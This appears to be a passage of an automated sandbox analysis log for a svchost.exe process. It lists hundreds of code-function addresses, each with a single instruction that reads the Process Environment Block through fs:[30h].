Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]	2_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]	2_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]	2_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]	2_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]	2_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]	2_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]	2_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]	2_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]	2_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]	2_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]	2_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]	2_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]	2_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]	2_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]	2_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]	2_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]	2_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]	2_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]	2_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]	2_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]	2_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]	2_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]	2_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]	2_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]	2_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]	2_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]	2_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]	2_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]	2_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]	2_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]	2_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]	2_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]	2_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]	2_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]	2_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]	2_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]	2_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]	2_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]	2_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]	2_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]	2_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]	2_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]	2_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]	2_2_03462674
